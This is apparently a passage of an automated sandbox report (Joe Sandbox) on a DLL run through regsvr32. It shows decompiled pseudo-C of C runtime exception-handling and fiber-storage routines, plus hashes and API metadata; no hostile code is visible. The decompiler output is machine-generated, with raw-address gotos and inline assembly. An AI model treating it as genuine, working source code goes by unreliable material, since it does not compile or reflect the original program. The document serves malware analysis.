                                                                                                                                                                                                            				if ( *((intOrPtr*)(_t109 + 0x40)) != 0) goto 0x80003bde;
                                                                                                                                                                                                            				if ( *__rcx == 0xe06d7363) goto 0x80003bde;
                                                                                                                                                                                                            				if ( *__rcx != 0x80000029) goto 0x80003bc2;
                                                                                                                                                                                                            				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x80003bc6;
                                                                                                                                                                                                            				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0x80003bde;
                                                                                                                                                                                                            				if ( *__rcx == 0x80000026) goto 0x80003bde;
                                                                                                                                                                                                            				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003bde;
                                                                                                                                                                                                            				if ((_t115[9] & 0x00000001) != 0) goto 0x80003d6d;
                                                                                                                                                                                                            				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x80003c76;
                                                                                                                                                                                                            				if (_t115[1] == 0) goto 0x80003d6d;
                                                                                                                                                                                                            				if (_a48 != 0) goto 0x80003d6d;
                                                                                                                                                                                                            				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x80003c63;
                                                                                                                                                                                                            				if ( *__rcx != 0x80000026) goto 0x80003c41;
                                                                                                                                                                                                            				_t60 = E00000001180002F2C(_t115, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
                                                                                                                                                                                                            				if (_t60 - 0xffffffff < 0) goto 0x80003d8d;
                                                                                                                                                                                                            				if (_t60 - _t115[1] >= 0) goto 0x80003d8d;
                                                                                                                                                                                                            				r9d = _t60;
                                                                                                                                                                                                            				E000000011800040F0(_t109, _t142, __r9, _t115);
                                                                                                                                                                                                            				goto 0x80003d6d;
                                                                                                                                                                                                            				if ( *_t136 != 0x80000029) goto 0x80003c63;
                                                                                                                                                                                                            				r9d =  *((intOrPtr*)(_t136 + 0x38));
                                                                                                                                                                                                            				if (r9d - 0xffffffff < 0) goto 0x80003d8d;
                                                                                                                                                                                                            				if (r9d - _t115[1] >= 0) goto 0x80003d8d;
                                                                                                                                                                                                            				goto 0x80003c31;
                                                                                                                                                                                                            				E00000001180002004(r9d - _t115[1], _t109, _t115, __r9, __r9, _t115);
                                                                                                                                                                                                            				goto 0x80003d6d;
                                                                                                                                                                                                            				if (_t115[3] != 0) goto 0x80003cbe;
                                                                                                                                                                                                            				if (( *_t115 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003c9e;
                                                                                                                                                                                                            				_t101 = _t115[8];
                                                                                                                                                                                                            				if (_t101 == 0) goto 0x80003c9e;
                                                                                                                                                                                                            				E00000001180002408(_t109);
                                                                                                                                                                                                            				if (_t101 != 0) goto 0x80003cbe;
                                                                                                                                                                                                            				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003d6d;
                                                                                                                                                                                                            				if ((_t115[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003d6d;
                                                                                                                                                                                                            				if ( *_t136 != 0xe06d7363) goto 0x80003d34;
                                                                                                                                                                                                            				if ( *((intOrPtr*)(_t136 + 0x18)) - 3 < 0) goto 0x80003d34;
                                                                                                                                                                                                            				if ( *((intOrPtr*)(_t136 + 0x20)) - 0x19930522 <= 0) goto 0x80003d34;
                                                                                                                                                                                                            				_t111 =  *((intOrPtr*)(_t136 + 0x30));
                                                                                                                                                                                                            				if ( *((intOrPtr*)(_t111 + 8)) == 0) goto 0x80003d34;
                                                                                                                                                                                                            				E0000000118000241C(_t111);
                                                                                                                                                                                                            				if (_t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)) == 0) goto 0x80003d34;
                                                                                                                                                                                                            				_v32 = _a64 & 0x000000ff;
                                                                                                                                                                                                            				_v40 = _a56;
                                                                                                                                                                                                            				_v48 = _a48;
                                                                                                                                                                                                            				_v56 = _t115;
                                                                                                                                                                                                            				 *0x80016370(_t158);
                                                                                                                                                                                                            				goto 0x80003d72;
                                                                                                                                                                                                            				_v32 = _a56;
                                                                                                                                                                                                            				_v40 = _a48;
                                                                                                                                                                                                            				_v48 = _a64;
                                                                                                                                                                                                            				_v56 = _t115;
                                                                                                                                                                                                            				E00000001180003328(_a64 & 0x000000ff, 0x80000026, __esi, _t136, _t142, _t159, _t139, _t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)));
                                                                                                                                                                                                            				return 1;
                                                                                                                                                                                                            			}



















                                                                                                                                                                                                            0x180003c7a
                                                                                                                                                                                                            0x180003c88
                                                                                                                                                                                                            0x180003c8a
                                                                                                                                                                                                            0x180003c8e
                                                                                                                                                                                                            0x180003c90
                                                                                                                                                                                                            0x180003c9c
                                                                                                                                                                                                            0x180003caa
                                                                                                                                                                                                            0x180003cb8
                                                                                                                                                                                                            0x180003cc4
                                                                                                                                                                                                            0x180003cca
                                                                                                                                                                                                            0x180003cd3
                                                                                                                                                                                                            0x180003cd5
                                                                                                                                                                                                            0x180003cdd
                                                                                                                                                                                                            0x180003cdf
                                                                                                                                                                                                            0x180003cf2
                                                                                                                                                                                                            0x180003d09
                                                                                                                                                                                                            0x180003d18
                                                                                                                                                                                                            0x180003d20
                                                                                                                                                                                                            0x180003d27
                                                                                                                                                                                                            0x180003d2c
                                                                                                                                                                                                            0x180003d32
                                                                                                                                                                                                            0x180003d3f
                                                                                                                                                                                                            0x180003d51
                                                                                                                                                                                                            0x180003d5f
                                                                                                                                                                                                            0x180003d63
                                                                                                                                                                                                            0x180003d68
                                                                                                                                                                                                            0x180003d8c

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                                            • API String ID: 851805269-3733052814
                                                                                                                                                                                                            • Opcode ID: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
                                                                                                                                                                                                            • Instruction ID: ef6ae88387dfa06c815bde898961dd69fb07e80911919095ce8a45e838d8869a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C5617F3220078886EBB6CF26E44539877A9F758BD4F18C116EB9847BD5CF38D699C701
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            C-Code - Quality: 30%
                                                                                                                                                                                                            			E00000001180002A84(void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r8, intOrPtr* __r9) {
                                                                                                                                                                                                            				void* _t76;
                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                            				void* _t84;
                                                                                                                                                                                                            				intOrPtr _t101;
                                                                                                                                                                                                            				intOrPtr _t103;
                                                                                                                                                                                                            				void* _t113;
                                                                                                                                                                                                            				void* _t118;
                                                                                                                                                                                                            				void* _t130;
                                                                                                                                                                                                            				long long _t133;
                                                                                                                                                                                                            				intOrPtr* _t135;
                                                                                                                                                                                                            				signed long long _t144;
                                                                                                                                                                                                            				void* _t150;
                                                                                                                                                                                                            				signed long long _t154;
                                                                                                                                                                                                            				void* _t156;
                                                                                                                                                                                                            				long long _t158;
                                                                                                                                                                                                            				intOrPtr* _t159;
                                                                                                                                                                                                            				void* _t161;
                                                                                                                                                                                                            				void* _t162;
                                                                                                                                                                                                            				signed long long _t166;
                                                                                                                                                                                                            				void* _t170;
                                                                                                                                                                                                            				intOrPtr _t171;
                                                                                                                                                                                                            				void* _t173;
                                                                                                                                                                                                            				void* _t174;
                                                                                                                                                                                                            				void* _t176;
                                                                                                                                                                                                            				void* _t178;
                                                                                                                                                                                                            				void* _t180;
                                                                                                                                                                                                            				intOrPtr* _t181;
                                                                                                                                                                                                            
                                                                                                                                                                                                            				_t130 = __rax;
                                                                                                                                                                                                            				 *((long long*)(_t161 + 8)) = __rbx;
                                                                                                                                                                                                            				 *((long long*)(_t161 + 0x10)) = _t158;
                                                                                                                                                                                                            				 *((long long*)(_t161 + 0x18)) = __rsi;
                                                                                                                                                                                                            				_t162 = _t161 - 0x40;
                                                                                                                                                                                                            				_t159 = __rcx;
                                                                                                                                                                                                            				_t181 = __r9;
                                                                                                                                                                                                            				_t174 = __rdx;
                                                                                                                                                                                                            				E00000001180004584(_t76, __r8);
                                                                                                                                                                                                            				_t171 =  *((intOrPtr*)(__r9 + 8));
                                                                                                                                                                                                            				_t135 =  *((intOrPtr*)(__r9 + 0x38));
                                                                                                                                                                                                            				_t178 =  *__r9 - _t171;
                                                                                                                                                                                                            				_t103 =  *((intOrPtr*)(__r9 + 0x48));
                                                                                                                                                                                                            				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x80002bac;
                                                                                                                                                                                                            				 *((long long*)(_t162 + 0x30)) = __rcx;
                                                                                                                                                                                                            				 *((long long*)(_t162 + 0x38)) = __r8;
                                                                                                                                                                                                            				if (_t103 -  *_t135 >= 0) goto 0x80002c58;
                                                                                                                                                                                                            				_t154 = __r8 + __r8;
                                                                                                                                                                                                            				if (_t178 - _t130 < 0) goto 0x80002b9e;
                                                                                                                                                                                                            				if (_t178 - _t130 >= 0) goto 0x80002b9e;
                                                                                                                                                                                                            				if ( *((intOrPtr*)(_t135 + 0x10 + _t154 * 8)) == 0) goto 0x80002b9e;
                                                                                                                                                                                                            				if ( *((intOrPtr*)(_t135 + 0xc + _t154 * 8)) == 1) goto 0x80002b2a;
                                                                                                                                                                                                            				_t113 =  *((long long*)(_t130 + _t171))(_t180, _t176, _t173, _t170, _t150);
                                                                                                                                                                                                            				if (_t113 < 0) goto 0x80002ba5;
                                                                                                                                                                                                            				if (_t113 <= 0) goto 0x80002b9e;
                                                                                                                                                                                                            				if ( *((intOrPtr*)(__rcx)) != 0xe06d7363) goto 0x80002b5b;
                                                                                                                                                                                                            				if ( *0x800164f8 == 0) goto 0x80002b5b;
                                                                                                                                                                                                            				if (E0000000118000F7F0(_t130 + _t171, _t135, 0x800164f8) == 0) goto 0x80002b5b;
                                                                                                                                                                                                            				_t83 =  *0x800164f8();
                                                                                                                                                                                                            				r8d = 1;
                                                                                                                                                                                                            				_t84 = E00000001180004550(_t83, _t159 + _t171, _t174);
                                                                                                                                                                                                            				_t101 =  *((intOrPtr*)(_t135 + 0x10 + _t154 * 8));
                                                                                                                                                                                                            				r9d =  *_t159;
                                                                                                                                                                                                            				 *((long long*)(_t162 + 0x28)) =  *((intOrPtr*)(_t181 + 0x40));
                                                                                                                                                                                                            				_t133 =  *((intOrPtr*)(_t181 + 0x28));
                                                                                                                                                                                                            				 *((long long*)(_t162 + 0x20)) = _t133;
                                                                                                                                                                                                            				__imp__RtlUnwindEx();
                                                                                                                                                                                                            				E00000001180004580(_t84);
                                                                                                                                                                                                            				goto 0x80002ada;
                                                                                                                                                                                                            				goto 0x80002c5d;
                                                                                                                                                                                                            				_t156 =  *((intOrPtr*)(_t181 + 0x20)) - _t171;
                                                                                                                                                                                                            				goto 0x80002c4e;
                                                                                                                                                                                                            				_t144 = _t174 + _t174;
                                                                                                                                                                                                            				if (_t178 - _t133 < 0) goto 0x80002c4c;
                                                                                                                                                                                                            				_t118 = _t178 - _t133;
                                                                                                                                                                                                            				if (_t118 >= 0) goto 0x80002c4c;
                                                                                                                                                                                                            				r10d =  *(_t159 + 4);
                                                                                                                                                                                                            				r10d = r10d & 0x00000020;
                                                                                                                                                                                                            				if (_t118 == 0) goto 0x80002c21;
                                                                                                                                                                                                            				r9d = 0;
                                                                                                                                                                                                            				if (_t101 == 0) goto 0x80002c1c;
                                                                                                                                                                                                            				r8d = r9d;
                                                                                                                                                                                                            				_t166 = _t159 + _t159;
                                                                                                                                                                                                            				if (_t156 - _t133 < 0) goto 0x80002c14;
                                                                                                                                                                                                            				if (_t156 - _t133 >= 0) goto 0x80002c14;
                                                                                                                                                                                                            				if ( *((intOrPtr*)(_t135 + 0x10 + _t166 * 8)) !=  *((intOrPtr*)(_t135 + 0x10 + _t144 * 8))) goto 0x80002c14;
                                                                                                                                                                                                            				if ( *((intOrPtr*)(_t135 + 0xc + _t166 * 8)) ==  *((intOrPtr*)(_t135 + 0xc + _t144 * 8))) goto 0x80002c1c;
                                                                                                                                                                                                            				r9d = r9d + 1;
                                                                                                                                                                                                            				if (r9d - _t101 < 0) goto 0x80002be4;
                                                                                                                                                                                                            				if (r9d != _t101) goto 0x80002c58;
                                                                                                                                                                                                            				if ( *((intOrPtr*)(_t135 + 0x10 + _t144 * 8)) == 0) goto 0x80002c35;
                                                                                                                                                                                                            				if (_t156 != _t133) goto 0x80002c4c;
                                                                                                                                                                                                            				if (r10d != 0) goto 0x80002c58;
                                                                                                                                                                                                            				goto 0x80002c4c;
                                                                                                                                                                                                            				 *((intOrPtr*)(_t181 + 0x48)) = _t150 + 1;
                                                                                                                                                                                                            				r8d =  *((intOrPtr*)(_t135 + 0xc + _t144 * 8));
                                                                                                                                                                                                            				 *((long long*)(_t166 + _t171))();
                                                                                                                                                                                                            				if (_t103 + 2 -  *_t135 < 0) goto 0x80002bb8;
                                                                                                                                                                                                            				return 1;
                                                                                                                                                                                                            			}































                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                            • String ID: csm$f
                                                                                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                                                                                            • Opcode ID: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
                                                                                                                                                                                                            • Instruction ID: 7da8602e18cf7747c8af8830ce248ccf40cfdad7849785c1bee6e388392e864c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D551BD32601A588AEBAADF15E844B9D37A5F348BC8F51C121FE1A47789DF74DA89C700
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                            • Opcode ID: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
                                                                                                                                                                                                            • Instruction ID: 6c3fae355f4def66f2243ece08b04bf3b1533bf3e7ed4235295a513a2b2c2168
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62F06D75714E0891FB92CB24E8443EA6371EB8DBE1F588215FA6A462F6CF2CC24CC300
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                            			E000000011800077FC(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                            				signed int _t30;
                                                                                                                                                                                                            				signed int _t31;
                                                                                                                                                                                                            				signed int _t42;
                                                                                                                                                                                                            				signed int _t43;
                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                            				void* _t51;
                                                                                                                                                                                                            
                                                                                                                                                                                                            				_a8 = __rbx;
                                                                                                                                                                                                            				_a16 = __rsi;
                                                                                                                                                                                                            				_t27 = __ecx & 0x0000001f;
                                                                                                                                                                                                            				if ((__ecx & 0x00000008) == 0) goto 0x8000782e;
                                                                                                                                                                                                            				if (sil >= 0) goto 0x8000782e;
                                                                                                                                                                                                            				E0000000118000BC4C(_t27, _t51);
                                                                                                                                                                                                            				_t28 = _t27 & 0xfffffff7;
                                                                                                                                                                                                            				goto 0x80007885;
                                                                                                                                                                                                            				_t42 = 0x00000004 & dil;
                                                                                                                                                                                                            				if (_t42 == 0) goto 0x80007849;
                                                                                                                                                                                                            				asm("dec eax");
                                                                                                                                                                                                            				if (_t42 >= 0) goto 0x80007849;
                                                                                                                                                                                                            				E0000000118000BC4C(_t28, _t51);
                                                                                                                                                                                                            				_t29 = _t28 & 0xfffffffb;
                                                                                                                                                                                                            				goto 0x80007885;
                                                                                                                                                                                                            				_t43 = dil & 0x00000001;
                                                                                                                                                                                                            				if (_t43 == 0) goto 0x80007865;
                                                                                                                                                                                                            				asm("dec eax");
                                                                                                                                                                                                            				if (_t43 >= 0) goto 0x80007865;
                                                                                                                                                                                                            				E0000000118000BC4C(_t29, _t51);
                                                                                                                                                                                                            				_t30 = _t29 & 0xfffffffe;
                                                                                                                                                                                                            				goto 0x80007885;
                                                                                                                                                                                                            				_t44 = dil & 0x00000002;
                                                                                                                                                                                                            				if (_t44 == 0) goto 0x80007885;
                                                                                                                                                                                                            				asm("dec eax");
                                                                                                                                                                                                            				if (_t44 >= 0) goto 0x80007885;
                                                                                                                                                                                                            				if ((dil & 0x00000010) == 0) goto 0x80007882;
                                                                                                                                                                                                            				E0000000118000BC4C(_t30, _t51);
                                                                                                                                                                                                            				_t31 = _t30 & 0xfffffffd;
                                                                                                                                                                                                            				_t46 = dil & 0x00000010;
                                                                                                                                                                                                            				if (_t46 == 0) goto 0x8000789f;
                                                                                                                                                                                                            				asm("dec eax");
                                                                                                                                                                                                            				if (_t46 >= 0) goto 0x8000789f;
                                                                                                                                                                                                            				E0000000118000BC4C(_t31, _t51);
                                                                                                                                                                                                            				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                                                                                                                                                                                                            			}














                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                                            • Opcode ID: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
                                                                                                                                                                                                            • Instruction ID: 766be9376166aa195c434f29f3971196c8b67f74f947fd55b9f7e9fcb960d4ba
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D117736F90A0941F7EE9128D45A3E63141AB6C3F4F59C624B66E462E7CF2C4B59C305
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008017
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008036
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000805E
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000806F
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008080
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                            • Opcode ID: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
                                                                                                                                                                                                            • Instruction ID: be0361fe5fc774fdb93e2323036551c88fb1abd5f2001d1ea80391924f68e359
                                                                                                                                                                                                            • Opcode Fuzzy Hash: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80115B7070924881FADBD32569553E932927F8C7F0F18C324B8B9067DADE69C64D5701
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                            • Opcode ID: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
                                                                                                                                                                                                            • Instruction ID: 1e63756919ea820504c2c280bc0c9b8fbb4cbfe5ca1be2f3c00cf3ab00ed04ff
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F111397070624D41FAEBE22594527F932826B6D3F0F58CB24B93A0A2C7DE2C9A4D4310
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                            			E00000001180003800(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                            				void* _t42;
                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                            				void* _t52;
                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                            				void* _t56;
                                                                                                                                                                                                            				void* _t59;
                                                                                                                                                                                                            
                                                                                                                                                                                                            				_t27 = _t45;
                                                                                                                                                                                                            				 *((long long*)(_t27 + 0x20)) = __rbx;
                                                                                                                                                                                                            				 *((long long*)(_t27 + 0x18)) = __r8;
                                                                                                                                                                                                            				 *((long long*)(_t27 + 0x10)) = __rdx;
                                                                                                                                                                                                            				_t43 = _t27 - 0x3f;
                                                                                                                                                                                                            				_t46 = _t45 - 0xc0;
                                                                                                                                                                                                            				if ( *__rcx == 0x80000003) goto 0x800038a4;
                                                                                                                                                                                                            				E00000001180002D40(_t27);
                                                                                                                                                                                                            				r12d =  *((intOrPtr*)(_t43 + 0x6f));
                                                                                                                                                                                                            				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0x800038bf;
                                                                                                                                                                                                            				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
                                                                                                                                                                                                            				E00000001180002D40(_t27);
                                                                                                                                                                                                            				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0x800038bf;
                                                                                                                                                                                                            				if ( *__rcx == 0xe0434f4d) goto 0x800038bf;
                                                                                                                                                                                                            				r13d =  *((intOrPtr*)(_t43 + 0x77));
                                                                                                                                                                                                            				if ( *__rcx == 0xe0434352) goto 0x800038c3;
                                                                                                                                                                                                            				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
                                                                                                                                                                                                            				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
                                                                                                                                                                                                            				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
                                                                                                                                                                                                            				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
                                                                                                                                                                                                            				_t19 = E00000001180001F20(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
                                                                                                                                                                                                            				if (_t19 == 0) goto 0x800038c3;
                                                                                                                                                                                                            				return _t19;
                                                                                                                                                                                                            			}
















                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                            • API String ID: 3544855599-2084237596
